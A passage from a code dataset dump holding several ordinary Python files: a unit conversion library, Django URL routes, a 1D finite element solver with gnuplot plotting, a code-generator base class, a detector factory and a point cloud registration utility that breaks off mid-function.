degC\":0.0000980638,\r\n \"m H2O @ 4 degC\":0.0980638,\r\n \"bar\":1.0,\r\n \"milibar\":1e-3,\r\n \"dyne/cm2\":1e-6,\r\n \"kilogram-force/m2\":0.000098066,\r\n \"psi\":0.068947573,\r\n \"torr\":0.0013332239}\r\n\r\n # Ref unit is 0 degC\r\n # unit_to = f[0] + f[1]*unit_from\r\n dic_temperature_to_celsius = {\"Kelvin\":[-273.15, 1],\r\n \"Fahrenheit\":[-32*5.0/9.0, 5.0/9.0],\r\n \"Rankine\":[-491.67*5.0/9.0, 5.0/9.0],\r\n \"Celsius\":[0, 1]}\r\n dic_temperature_from_celsius = {\"Kelvin\":[273.15, 1],\r\n \"Fahrenheit\":[32, 9.0/5.0],\r\n \"Rankine\":[273.15*9.0/5.0, 9.0/5.0],\r\n \"Celsius\":[0, 1]}\r\n\r\n # Ref unit is 1 m\r\n dic_length = {\"picometre\":1e-12,\r\n \"angstrom\":1e-10,\r\n \"nanometre\":1e-9,\r\n \"micrometre\":1e-6,\r\n \"milimetre\":1e-3,\r\n \"centimetre\":1e-2,\r\n \"metre\":1.0,\r\n \"decametre\":10,\r\n \"hectometre\":100,\r\n \"kilometre\":1000,\r\n \"yard\":0.9144,\r\n \"mile\":1609.35,\r\n \"foot\":0.3048,\r\n \"inch\":2.54e-2,\r\n \"lightyear\":9460660000000000}\r\n\r\n # Ref unit is 1 kg\r\n dic_weight = {\"kilogram\":1,\r\n \"gram\":1e-3,\r\n \"miligram\":1e-6,\r\n \"metric ton\":1000,\r\n \"pound\":0.453592,\r\n \"ounce\":0.0283495,\r\n \"carrat\":0.0002,\r\n \"atomic mass unit\":1.660540199e-27}\r\n\r\n # Ref unit is 1 second\r\n dic_time = {\"month\":30.5*24*3600,\r\n \"day\":24*3600,\r\n \"hour\":3600,\r\n \"minute\":60,\r\n \"second\":1}\r\n\r\n dic_units_conversion = {\"pressure\":dic_pressure,\r\n \"temperature\":[dic_temperature_to_celsius, dic_temperature_from_celsius],\r\n \"length\":dic_length,\r\n \"weight\":dic_weight,\r\n \"time\": dic_time,\r\n \"speed\":[dic_length, dic_time],\r\n \"pace\": [dic_time, dic_length]}\r\n\r\n return dic_units_conversion\r\n\r\n\r\ndef get_default_units():\r\n defaults_dic = {\"pressure\":\"bar\",\r\n \"temperature\":\"Celsius\",\r\n \"length\":\"centimetre\",\r\n \"weight\":\"kilogram\",\r\n \"time\":\"second\"}\r\n return defaults_dic\r\n\r\n\r\ndef conv_temperature(N_from, unit_from, unit_to, dic_list):\r\n \"\"\"\r\n For temperature conversions\r\n \"\"\"\r\n dic_t_to_celsius = dic_list[0]\r\n dic_celsius_to_t = dic_list[1]\r\n temp_celsius = dic_t_to_celsius[unit_from][0] + dic_t_to_celsius[unit_from][1]*N_from\r\n N_to = dic_celsius_to_t[unit_to][0] + dic_celsius_to_t[unit_to][1]*temp_celsius\r\n return N_to\r\n\r\n\r\ndef conv_simple(N_from, unit_from, unit_to, dic):\r\n \"\"\"\r\n For simple conversions\r\n \"\"\"\r\n f_from = dic[unit_from]\r\n f_to = dic[unit_to]\r\n N_to = float(N_from) * f_from / f_to\r\n return N_to\r\n\r\n\r\ndef conv_composite(N_from, unit_from, unit_to, dic_list):\r\n \"\"\"\r\n For units of the type m/s\r\n \"\"\"\r\n [unit_from_num, unit_from_den] = unit_from.split(\"/\")\r\n [unit_to_num, unit_to_den] = unit_to.split(\"/\")\r\n N_to_num = conv_simple(1, unit_from_num, unit_to_num, dic_list[0])\r\n N_to_den = conv_simple(1, unit_from_den, unit_to_den, dic_list[1])\r\n N_to = float(N_from) * N_to_num / N_to_den\r\n return N_to\r\n\r\n\r\ndef conv(N_from, unit_type, unit_from, unit_to, dic):\r\n \"\"\"\r\n Main function to be used. Should use all other functions\r\n \"\"\"\r\n if unit_type == \"temperature\":\r\n N_to = conv_temperature(N_from, unit_from, unit_to, dic[\"temperature\"])\r\n else:\r\n if unit_type == \"speed\":\r\n N_to = conv_composite(N_from, unit_from, unit_to, dic[\"speed\"])\r\n else:\r\n if unit_type == \"pace\":\r\n N_to = conv_composite(N_from, unit_from, unit_to, dic[\"pace\"])\r\n else:\r\n N_to = conv_simple(N_from, unit_from, unit_to, dic[unit_type])\r\n return N_to\r\n\r\n\r\ndef get_options(dic):\r\n options = dic.keys()\r\n return options\r\n\r\n\r\nif __name__ == \"__main__\":\r\n# Testing\r\n dic_main = init()\r\n N = conv(100,\"length\", \"milimetre\",\"milimetre\",dic_main)\r\n print(N)\r\n\r\n speed = 4.2530\r\n\r\n dic_main = init()\r\n N = conv(speed, \"speed\", \"metre/second\", \"kilometre/hour\", dic_main)\r\n print(N)\r\n\r\n dic_main = init()\r\n N = conv(1/speed, \"pace\", \"second/metre\", \"minute/kilometre\", dic_main)\r\n print(N)","sub_path":"libraries/conversion_lib.py","file_name":"conversion_lib.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95288699","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns(\n '', # Empty string as prefix\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^profiles/', include('apps.profiles.urls')),\n\n url(r'^accounts/', include('allauth.urls')),\n\n url(r'^$', include('apps.core.urls')),\n)\n","sub_path":"horas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"572753892","text":"from django.urls import path, include\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path(\"\", include(\"school.urls\")),\n path(\"students/\", include(\"students.urls\")),\n path(\"staff/\", include(\"staff.urls\")),\n path(\"auth/\", include(\"accounts.urls\")),\n path(\"pdf/\", include(\"pdf_engine.urls\")),\n path(\"ajax/\", include(\"ajax.urls\")),\n path(\"sms/\", include(\"sms.urls\")),\n path('admin/', admin.site.urls),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n","sub_path":"curie/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"563299829","text":"#\n# ps7pr3.py (Problem Set 7, Problem 3)\n#\n# More image processing!\n#\n# Computer Science 111\n#\n# name:\n# email:\n# \n# This problem is an individual-only problem that you should complete\n# on your own.\n#\n\n# IMPORTANT: This file is for your solutions to problem 3.\n# Your solutions to problem 2 should go in ps7pr2.py instead.\n\nfrom cs111png import *\n\ndef brightness(pixel):\n \"\"\" takes a pixel (an [R, G, B] list) and returns a value\n between 0 and 255 that represents the brightness of that pixel.\n \"\"\"\n red = pixel[0]\n green = pixel[1]\n blue = pixel[2]\n return (21*red + 72*green + 7*blue) // 100\n \n### PUT YOUR WORK FOR PROBLEM 3 BELOW. ###\n","sub_path":"ps7image/ps7pr3.py","file_name":"ps7pr3.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"409253058","text":"import sys, os\nimport pyfem1d.pyfem1d_cmd as cmd_\nimport numpy as np\nimport collections\nfrom pyfem1d.umat import *\nfrom pyfem1d.load import *\nfrom numpy import zeros, dtype, float64\nfrom subprocess import call\n\n\nclass Analysis:\n def __init__(self):\n self.cmdShell = cmd_.Pyfem1dShell(self)\n\n self.input_file = None\n self.output_file = None\n self.logFile = None\n self.stress_file = None\n self.displacement_file = None\n self.plot_file = None\n self.interactive = False\n # self.gui = False\n self.o_node = None\n self.o_elem = None\n\n self.umat_dict = {}\n self.load_dict = {}\n\n self.current_umat_key = None\n self.current_load_key = None\n\n self.umat = None\n self.load = None\n\n self.bctype = None\n self.abspath = os.path.dirname(os.path.abspath(__file__))\n self.workingDirectory = None\n\n self.number_of_elements = None\n self.timestep = None\n self.maximum_time = None\n\n def header(self):\n header = \"\"\n\n header += format_if_not_none(\" Input file : \", self.input_file)\n header += format_if_not_none(\" Output file : \", self.output_file)\n header += format_if_not_none(\" Stress file : \", self.stress_file)\n header += format_if_not_none(\" Disp. file : \",\n self.displacement_file)\n\n header += format_if_not_none(\" Number of Elements nelem = \",\n self.number_of_elements)\n header += format_if_not_none(\" Time step size dt = \",\n self.timestep)\n header += format_if_not_none(\" Duration tmax = \",\n self.maximum_time)\n header += format_if_not_none(\" Boundary Condition bctype = \",\n self.bctype)\n\n header += format_if_not_none(\" Umat : \", self.umat)\n header += format_if_not_none(\" Load : \", self.load)\n\n return header\n\n def printHeader(self):\n \"\"\"Prints program header with version\"\"\"\n print(\"pyfem1d - 1d finite elements for testing material formulations\")\n #print(self.header())\n\n def add_umats(self, path):\n self.umat_dict.update(deploy_umats(path))\n\n def add_loads(self, path):\n self.load_dict.update(deploy_loads(path))\n\n def set_umat(self, key):\n self.umat = self.umat_dict[key]\n self.current_umat_key = key\n\n def set_umat_parameters(self, parameters):\n self.umat.parameter_values = parameters\n self.umat_dict[self.current_umat_key].parameter_values = parameters\n\n def set_load(self, key):\n self.load = self.load_dict[key]\n self.current_load_key = key\n\n def set_load_parameters(self, parameters):\n self.load.parameter_values = parameters\n self.load_dict[self.current_load_key].parameter_values = parameters\n\n def plotToWindow(self, stress_file=None):\n if not stress_file:\n stress_file = self.stress_file\n commands = \"\"\n commands += \"set terminal X11 size 1300 400;\"\n commands += \"set key rmargin;\"\n commands += \"set multiplot;\"\n commands += \"set lmargin at screen 0.025;\"\n commands += \"set rmargin at screen 0.325;\"\n commands += \"set xlabel \\\"Time\\\";\"\n commands += \"set ylabel \\\"Strain\\\";\"\n commands += \"plot \\\"%s\\\" u 1:2 w l;\" % stress_file\n commands += \"set lmargin at screen 0.35;\"\n commands += \"set rmargin at screen 0.65;\"\n commands += \"set ylabel \\\"Stress\\\";\"\n commands += \"plot \\\"%s\\\" u 1:3 w l;\" % stress_file\n commands += \"set lmargin at screen 0.675;\"\n commands += \"set rmargin at screen 0.975;\"\n commands += \"set xlabel \\\"Strain\\\";\"\n commands += \"plot \\\"%s\\\" u 2:3 w l;\" % stress_file\n commands += \"unset multiplot;\"\n\n call([\"gnuplot\", \"-p\", \"-e\", commands])\n\n#set output \"| ps2pdf -dCompatibilityLevel=1.4 -dPDFSETTINGS=/prepress - \"+self.ofilebase+\"_plot.pdf;\\\n\n def plotPdf(self, stress_file, plot_file):\n # if not stress_file:\n # stress_file = self.stress_file\n\n # if not plot_file:\n # plot_file = self.plot_file\n\n print(\"Plotting to file %s\" % plot_file)\n\n commands = \"\"\n commands += \"set term pdf enhanced font \\\"Helvetica,10\\\";\"\n commands += \"set output \\\"%s\\\";\" % plot_file\n commands += \"set lmargin;\"\n commands += \"set rmargin;\"\n commands += \"set grid;\"\n commands += \"unset key;\"\n commands += \"set xlabel \\\"Time\\\";\"\n commands += \"set ylabel \\\"Strain\\\";\"\n commands += \"plot \\\"%s\\\" u 1:2 w l lt 1;\" % stress_file\n commands += \"set ylabel \\\"Stress\\\";\"\n commands += \"plot \\\"%s\\\" u 1:3 w l lt 1;\" % stress_file\n commands += \"set xlabel \\\"Strain\\\";\"\n commands += \"plot \\\"%s\\\" u 2:3 w l lt 1;\" % stress_file\n\n call([\"gnuplot\", \"-p\", \"-e\", commands])\n\n def startShell(self):\n self.cmdShell.cmdloop()\n\n def setRuntimeParameters(self):\n self.o_node = self.number_of_elements + 1 #node to be written to the output\n self.o_elem = self.number_of_elements #element to be written to the output\n self.number_of_elements = self.number_of_elements\n self.neq = self.number_of_elements + 1\n self.nnode = self.number_of_elements + 1\n self.t = 0\n\n if isinstance(self.bctype, collections.Iterable):\n self.bctype = 0\n\n def solve(self):\n '''Solution function'''\n\n if not self.umat:\n raise Exception(\"No umat function specified\")\n\n if not self.load:\n raise Exception(\"No load function specified\")\n\n if not self.maximum_time:\n raise Exception(\"No end time specified\")\n\n if not self.number_of_elements:\n raise Exception(\"No number of elements specified\")\n\n if not self.timestep:\n raise Exception(\"No timestep specified\")\n\n self.setRuntimeParameters()\n output = open(self.output_file, 'w')\n\n #self.update()\n\n print(self.header())\n output.write(self.header())\n #self.printheader(ofile=output)\n\n neq = self.number_of_elements + 1\n #Initialize the system matrices\n self.init_system()\n #Set time to zero\n self.t = 0.\n #Generate nodes & initialize solution vector\n dl = 1 / self.number_of_elements\n u = zeros((self.neq, 1))\n x = zeros((self.nnode, 1))\n #u= zeroflt(self.neq,1)\n #x= zeroflt(self.nnode,1)\n for i in range(int(self.nnode)):\n x[i] = (i - 1) * dl\n\n # open files for output at the selected node and element\n outd = open(self.displacement_file, 'w')\n outs = open(self.stress_file, 'w')\n\n # Simulation loop\n\n self.umat.initial_cond(self.number_of_elements)\n # if self.umat.initcond():\n # self.umat.initcond()(self.number_of_elements)\n\n while self.t <= self.maximum_time + self.timestep:\n\n load = self.load.value(self.t)\n if self.verbose:\n print(' Compute solution at t= %6.4f, load= %6.4f' %\n (self.t, load))\n\n # Newton iterations\n res = 1\n niter = 0\n nitermax = 50\n while res > 1.e-10 and niter < nitermax:\n #Calculate the residual vector and stiffness matrix\n #and update the history variables\n self.comp_stiffness(u)\n #impose boundary conditions\n if self.bctype == 0:\n self.kg[:][0] = 0.\n self.kg[0][:] = 0.\n self.kg[0][0] = 1.\n self.fg[-1] -= load\n self.fg[0] = 0.\n elif self.bctype == 2:\n du = load - u[-1]\n for i in range(int(neq)):\n self.fg[i] -= self.kg[i][-1] * du\n self.kg[:][0] = 0.\n self.kg[0][:] = 0.\n self.kg[-1][:] = 0\n self.kg[:][-1] = 0\n self.kg[0][0] = 1.\n self.kg[-1][neq - 1] = 1.\n self.fg[0] = 0.\n self.fg[-1] = -1 * du\n elif self.bctype == 1:\n self.kg[:][0] = 0.\n self.kg[0][:] = 0.\n self.kg[0][0] = 1.\n self.fg[1:-1] -= load * dl\n self.fg[-1] = self.fg[-1] - load * dl / 2\n self.fg[0] = 0\n else:\n raise Exception('Error: Undefined bc type identifier: ' +\n self.bctype)\n #calculate the residual\n res = np.linalg.norm(self.fg, 2)\n if self.verbose:\n print(' >> iter %2i, res = %10.5e' % (niter, res))\n #solve the system\n kginv = np.linalg.inv(self.kg)\n dg = np.dot(kginv, self.fg)\n #update nodal displacements\n u -= dg\n niter += 1\n # Print results\n #if self.verbose:\n output.write('\\n Solution at t=%6.4f, load= %6.4f\\n' %\n (self.t, load))\n output.write(' Nodal solutions\\n')\n output.write(' Node x-coord. u\\n')\n for i in range(int(neq)):\n output.write(' %4i %6.4e %6.4e\\n' % (i, x[i], u[i]))\n output.write('\\n Element solutions\\n')\n output.write(' Element Strain Stress\\n')\n for i in range(int(self.number_of_elements)):\n output.write(' %4i %6.4e %6.4e\\n' %\n (i, self.eps[i], self.sig[i]))\n outd.write(' %6.4e %6.4e\\n' % (self.t, u[self.o_node - 1]))\n outs.write(' %6.4e %6.4e %6.4e\\n' %\n (self.t, self.eps[self.o_elem - 1],\n self.sig[self.o_elem - 1]))\n\n # Update History\n # if self.umat.update():\n # self.umat.update()()\n self.umat.update()\n\n self.t += self.timestep\n\n print('Finished solution')\n outd.close()\n outs.close()\n output.close()\n\n def init_system(self):\n self.fg = zeros((self.neq, 1))\n self.kg = zeros((self.neq, self.neq))\n self.eps = zeros((self.number_of_elements, 1))\n self.sig = zeros((self.number_of_elements, 1))\n self.aa = zeros((self.number_of_elements, 1))\n #self.fg=zeroflt(self.neq,1)\n #self.kg=zeroflt(self.neq,self.neq)\n #self.eps=zeroflt(self.number_of_elements,1)\n #self.sig=zeroflt(self.number_of_elements,1)\n #self.aa=zeroflt(self.number_of_elements,1)\n self.dl = 1 / float(self.number_of_elements)\n\n def comp_stiffness(self, u):\n '''Compute stiffness matrix and residual vector,\n and update history variables'''\n offs = 0\n self.fg[:] = 0.\n self.kg[:][:] = 0.\n dN = zeros((2, 1))\n #dN=zeroflt(2,1)\n # Assembly: loop over elements\n for n in range(int(self.number_of_elements)):\n dN[0] = -1 / self.dl\n dN[1] = -1 * dN[0]\n #compute element strain\n epsl = (u[n + 1] - u[n]) / self.dl\n # Calculate the stress, modulus and update history at the Gauss point\n\n sigl, aal = self.umat.stress_tangent(self.timestep, n, epsl)\n\n #store the stresses and moduli\n self.eps[n] = epsl\n self.sig[n] = sigl\n self.aa[n] = aal\n #loop over element dofs: element stiffness and internal force vector\n #fe = zeroflt(2,1)\n #ke = zeroflt(2,2)\n fe = zeros((2, 1))\n ke = zeros((2, 2))\n for i in range(2):\n fe[i] += dN[i] * sigl * self.dl\n #\\int B^{T}\\sigma dV\n for j in range(2):\n ke[i][j] += dN[i] * aal * dN[\n j] * self.dl #\\int B^{T} E B dV\n\n #assemble global matrices\n for i in range(2):\n self.fg[i + offs] += fe[i]\n for j in range(2):\n self.kg[i + offs][j + offs] += ke[i][j]\n offs += 1\n\n\ndef format_if_not_none(prefix, var):\n return prefix + (str(var) if var else \"None\") + \"\\n\"\n","sub_path":"pyfem1d/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":12575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"280083198","text":"#!/usr/bin/env python\n\nfrom util import verifyName, hasDupes\n\nimport cog\n\n# 'object' is a C class so python doesn't let us set arbitrary\n# attributes on it. We subclass it so we can just smack whatever\n# we want on there.\nclass _object(object): pass\n\nclass GeneratorBase(object):\n def __init__(self, name, fields, config={}):\n self.config = config\n\n self.name = name\n self.fields = []\n self.possible_tags = set()\n\n self.schema = fields[0]\n assert type(fields[0]) == list\n\n for column in self.schema:\n assert type(column) == str\n\n for row in fields[1:]:\n field = _object()\n for field_name, value in zip(self.schema, row):\n verifyName(field_name)\n setattr(field, field_name, value)\n self.fields.append(field)\n\n fieldNames = [f.name for f in self.fields]\n maybeDupe = hasDupes(fieldNames)\n if maybeDupe:\n cog.error(\"You can't specify the same field name twice. \"\n \"Name specified twice: \" + maybeDupe)\n\n for f in self.fields:\n if hasattr(f, \"tags\") and f.tags != None:\n if type(f.tags) == list:\n maybeDupe = hasDupes(f.tags)\n if maybeDupe:\n cog.error(\"You can't specify the same tag twice \"\n \" on the same field. \"\n \"Tag specified twice: \" + maybeDupe +\n \" on field: \" + f.name)\n self.possible_tags.update(f.tags)\n elif type(f.tags) == set:\n self.possible_tags.update(f.tags)\n else:\n self.possible_tags.add(f.tags)\n f.tags = [f.tags]\n else:\n f.tags = []\n\n for t in f.tags:\n verifyName(t)\n\n if not hasattr(f, \"metadata\") or f.metadata == None:\n f.metadata = []\n elif type(f.metadata) == list:\n metaNames = [m.name for m in f.metadata]\n maybeDupe = hasDupes(metaNames)\n if maybeDupe:\n cog.error(\"You can't specify metadata with the same \"\n \"name twice. Name specified twice: \" +\n maybeDupe + \" on field: \" + f.name)\n else:\n f.metadata = [f.metadata]\n\n if not hasattr(f, \"value\"):\n f.value = None\n\n if not hasattr(f, \"type\"):\n f.type = None\n\n self.generate()\n\n def generate(self):\n pass\n\n","sub_path":"cog-recipes/cogflect/GeneratorBase.py","file_name":"GeneratorBase.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"124857825","text":"\"\"\"\nRoutines for detection\nEmily Dunkel\n2018\n\"\"\"\nimport os\nimport sys\nfrom helm.tracker.detectors import helm_orig as helm_original_detector\nimport helm.tracker.postprocessors.postprocessor_factory as tracking_utils\nimport helm.tracker.file_handler as file_utils\nimport helm.tracker.trackers.dbscan as db_utils\n\n# current directory file is in\nfile_path = os.path.dirname(os.path.realpath(__file__))\n\n\ndef detect_init(detect_algs, config):\n \"\"\"\n Check inputs for detection methods\n\n Detection method does not exist\n >>> detect_init('test', {})\n Traceback (most recent call last):\n ValueError:...\n \"\"\"\n\n for detect_type in detect_algs:\n if detect_type == 'helm_orig':\n file_utils.check_inputs(config['helm_orig'], ['threshold', 'epsilon_px', 'min_weight', 'min_px', 'noise_px', 'max_uncert_px'])\n elif detect_type == 'dbscan':\n pass\n else:\n raise ValueError('Detection method not in list. Possible methods include helm_orig')\n return None\n\n\ndef detect(img_diff, detect_algs, config, debug=False):\n \"\"\"\n Returns a dictionary of particles\n Inputs: img_diff = difference image\n particles = detections dictionary (from prior frames)\n detect_algs = detection algs to use (is a list)\n config = detection configurations\n is_first_call = True if is the first time calling\n ii = frame number\n \"\"\"\n \n # loop over user selected detection methods\n for detect_type in detect_algs:\n\n # Gary's original detection method\n if detect_type == 'helm_orig':\n particles = helm_original_detector.get_particles(img_diff, config['helm_orig'], debug)\n\n elif detect_type == 'dbscan':\n particles = db_utils.add_frame(img_diff)\n\n # undefined detection method\n else:\n print('detection method not in list: ', detect_type)\n sys.exit(0)\n\n # put code here to combine more than one detection method\n \n return particles\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)\n","sub_path":"helm/tracker/detectors/detector_factory.py","file_name":"detector_factory.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"207484335","text":"import argparse\nimport cv2\nimport logging\nimport numpy as np\nimport os\nimport sys\nimport time\nimport traceback\nimport rospy\nimport struct\nimport ctypes\nfrom sensor_msgs import point_cloud2\nfrom sensor_msgs.msg import PointCloud2, PointField\nfrom std_msgs.msg import Header\n\nfrom autolab_core import RigidTransform\nfrom perception import CameraIntrinsics\n\ntry:\n import cv2\n import pylibfreenect2 as lf2\nexcept:\n logging.warning('Unable to import pylibfreenect2. Python-only Kinect driver may not work properly.')\n\ntry:\n from cv_bridge import CvBridge, CvBridgeError\n import rospy\n import sensor_msgs.msg\nexcept ImportError:\n logging.warning(\"Failed to import ROS in Kinect2_sensor.py. Kinect will not be able to be used in bridged mode\")\n\n\nimport open3d as o3d\nimport copy\n\nfrom pcl_registration_utils import point_cloud_to_color_arr, make_pcd, visualize, get_pcd_bounds_str\n\ndef max_test_overhead_idx():\n f_list = os.listdir('./train_overhead_data')\n overhead_list = [f[:-4] for f in f_list if 'data' in f and 'pcd' in f]\n if len(overhead_list) == 0:\n return -1\n overhead_num = [int(f.split('_')[-1]) for f in overhead_list]\n return max(overhead_num)\n\n\ndef get_transform_file_for_dir(d):\n assert os.path.exists(d), 'Dir does not exist: {}'.format(d)\n # if 'overhead' in d:\n # return os.path.join(d, 'kinect2_overhead_to_world_calc_from_base.tf')\n # return os.path.join(d, 'kinect2_overhead_to_world.tf')\n return os.path.join(d, 'kinect2_overhead_to_world_calc_from_base.tf')\n\n\n\nclass PCLRegistrationUtils(object):\n def __init__(self): \n self.calib_dirs = { \n 'front_right': './calib/robot_middle/azure_kinect_front_right',\n 'front_left': './calib/robot_middle/azure_kinect_front_left',\n 'overhead': './calib/robot_middle/azure_kinect_overhead',\n }\n self.transform_by_camera = {} \n for k, v in self.calib_dirs.items():\n T = RigidTransform.load(get_transform_file_for_dir(v))\n T.from_frame = k\n T.to_frame = 'world'\n self.transform_by_camera[k] = T\n \n self.stereo_calib_data = [\n # (from, to, path)\n # ('front_right', 'overhead', './calib/stereo_calib_azure_cpp/Nov_19_try_3/overhead_to_front_right_x.tf')\n # ('front_right', 'overhead', './calib/stereo_calib_azure_cpp/Nov_20_matlab/overhead_to_front_right_3.tf')\n\n # do the inverse of this one?\n # ('front_right', 'overhead', './calib/stereo_calib_azure_cpp/Nov_21_combined/overhead_to_front_right_3.tf'),\n\n ('overhead', 'front_left', './calib/stereo_calib_azure_cpp/main_overhead_sec_front_left/front_left_to_overhead_5.tf'),\n\n # Transf between front_left and back_left camera \n ('front_left', 'back_left', './calib/stereo_calib_azure_cpp/main_front_left_sec_back_left/back_left_to_front_left_7.tf'),\n\n # Transf between front_right and back_right camera\n ('front_right', 'back_right', './calib/stereo_calib_azure_cpp/main_front_right_sec_back_right/back_right_to_front_right_2.tf')\n ]\n self.stereo_calib_dict = {}\n for s in self.stereo_calib_data:\n T = RigidTransform.load(s[2])\n T.from_frame = s[0]\n T.to_frame = s[1]\n self.stereo_calib_dict['{}${}'.format(s[1], s[0])] = T\n\n self.T_overhead_front_right = (self.transform_by_camera['overhead'].inverse()).dot(self.transform_by_camera['front_right'])\n self.T_overhead_front_left = (self.transform_by_camera['overhead'].inverse()).dot(self.transform_by_camera['front_left'])\n\n rospy.loginfo(\"Original transf matrix: \\n{}\".format(\n np.array_str(self.T_overhead_front_right.matrix, precision=5, suppress_small=True)))\n rospy.loginfo(\"New transf matrix: \\n{}\".format(\n np.array_str(self.stereo_calib_dict['front_left$overhead'].inverse().matrix, \n precision=5, suppress_small=True)))\n\n rospy.loginfo(\"Front left -> overhead transf matri: \\n\"\n \" Original : \\n{}\\n\"\n \" new : \\n{}\\n\".format(\n np.array_str(self.T_overhead_front_right.matrix, precision=5, suppress_small=True),\n np.array_str(self.stereo_calib_dict['front_left$overhead'].inverse().matrix, \n precision=5, suppress_small=True)\n ))\n\n # import pdb; pdb.set_trace()\n\n self.point_cloud_by_camera_dict = {}\n self.has_pcd_by_camera_dict = {}\n\n self.pcl_volume_min_bound = np.array([0.1, -0.4, -0.05])\n self.pcl_volume_max_bound = np.array([0.8, 0.4, 0.5])\n\n self.voxel_size = 0.01\n self.max_correspondence_distance_coarse = self.voxel_size * 15\n self.max_correspondence_distance_fine = self.voxel_size * 1.5\n\n\n def pairwise_registration(self, source, target):\n icp_coarse = o3d.registration.registration_icp(\n source, target, self.max_correspondence_distance_coarse, np.identity(4),\n o3d.registration.TransformationEstimationPointToPlane())\n icp_fine = o3d.registration.registration_icp(\n source, target, self.max_correspondence_distance_fine,\n icp_coarse.transformation,\n o3d.registration.TransformationEstimationPointToPlane())\n transformation_icp = icp_fine.transformation\n information_icp = o3d.registration.get_information_matrix_from_point_clouds(\n source, target, self.max_correspondence_distance_fine,\n icp_fine.transformation)\n return transformation_icp, information_icp\n\n def full_registration(self, pcds):\n pose_graph = o3d.registration.PoseGraph()\n odometry = np.identity(4)\n pose_graph.nodes.append(o3d.registration.PoseGraphNode(odometry))\n n_pcds = len(pcds)\n for source_id in range(n_pcds):\n for target_id in range(source_id + 1, n_pcds):\n transformation_icp, information_icp = self.pairwise_registration(\n pcds[source_id], pcds[target_id])\n print(\"Build o3d.registration.PoseGraph\")\n if target_id == source_id + 1: # odometry case\n odometry = np.dot(transformation_icp, odometry)\n pose_graph.nodes.append(\n o3d.registration.PoseGraphNode(np.linalg.inv(odometry)))\n pose_graph.edges.append(\n o3d.registration.PoseGraphEdge(source_id,\n target_id,\n transformation_icp,\n information_icp,\n uncertain=False))\n else: # loop closure case\n pose_graph.edges.append(\n o3d.registration.PoseGraphEdge(source_id,\n target_id,\n transformation_icp,\n information_icp,\n uncertain=True))\n return pose_graph\n\n\n def merge_multiple_pcd(self, pcd_list):\n for pcd in pcd_list:\n print(\"PCD min_bound: {}, max_bound: {}\".format(\n pcd.get_min_bound(), pcd.get_max_bound()))\n voxel_size = self.voxel_size\n voxel_grids = []\n for p in pcd_list:\n # v = o3d.geometry.VoxelGrid.create_from_point_cloud(p, 0.01)\n voxel_grids.append(p)\n \n '''\n for voxel_grid in voxel_grids: rospy.loginfo(\"old voxel grid size: {}\".format(len(voxel_grid.voxels)))\n voxel_list = voxel_grid.voxels\n for x in range(60, 120):\n for z in range(40, 80):\n v = o3d.geometry.Voxel([x, 0, z], [255, 0, 0])\n voxel_list.append(v)\n voxel_grid.voxels = voxel_list\n rospy.loginfo(\"new voxel grid size: {}\".format(len(voxel_grid.voxels)))\n visualize([voxel_grid])\n '''\n visualize(voxel_grids)\n import pdb; pdb.set_trace()\n\n visualize(voxel_grids[:1])\n visualize(voxel_grids[1:2])\n visualize(voxel_grids[2:3])\n\n\n # Find which voxels are occupied\n all_voxel_map = np.zeros((200, 200, 100), dtype=np.int32)\n for voxel_grid in voxel_grids:\n for v in voxel_grid.voxels:\n vi = v.grid_index\n if (vi[0] < all_voxel_map.shape[0] and\n vi[1] < all_voxel_map.shape[1] and\n vi[2] < all_voxel_map.shape[2]):\n all_voxel_map[vi[0], vi[1], vi[2]] += 1\n else:\n import pdb; pdb.set_trace()\n\n # Now remove the voxels which are not found in the rest\n\n for voxel_grid in voxel_grids:\n filt_voxels = []\n for v in voxel_grid.voxels:\n vi = v.grid_index\n if (vi[0] < all_voxel_map.shape[0] and\n vi[1] < all_voxel_map.shape[1] and\n vi[2] < all_voxel_map.shape[2]):\n # If this voxel was claimed as present by multiple cameras then\n # fill it. Should we also \n if all_voxel_map[vi[0], vi[1], vi[2]] >= 2:\n filt_voxels.append(v)\n voxel_grid.voxels = filt_voxels\n\n visualize(voxel_grids[:1])\n visualize(voxel_grids[1:2])\n visualize(voxel_grids[2:3])\n\n # import pdb; pdb.set_trace()\n\n pcds_down = [pcd.voxel_down_sample(voxel_size=self.voxel_size) for pcd in pcd_list]\n\n # Visualize\n visualize(pcds_down[:1])\n visualize(pcds_down[1:2])\n visualize(pcds_down[2:3])\n visualize(pcds_down)\n\n print(\"Full registration ...\")\n pose_graph = self.full_registration(pcds_down)\n\n print(\"Optimizing PoseGraph ...\")\n option = o3d.registration.GlobalOptimizationOption(\n max_correspondence_distance=self.max_correspondence_distance_fine,\n edge_prune_threshold=0.25,\n reference_node=0)\n o3d.registration.global_optimization(\n pose_graph, o3d.registration.GlobalOptimizationLevenbergMarquardt(),\n o3d.registration.GlobalOptimizationConvergenceCriteria(), option)\n\n print(\"Transform points and display\")\n for point_id in range(len(pcds_down)):\n 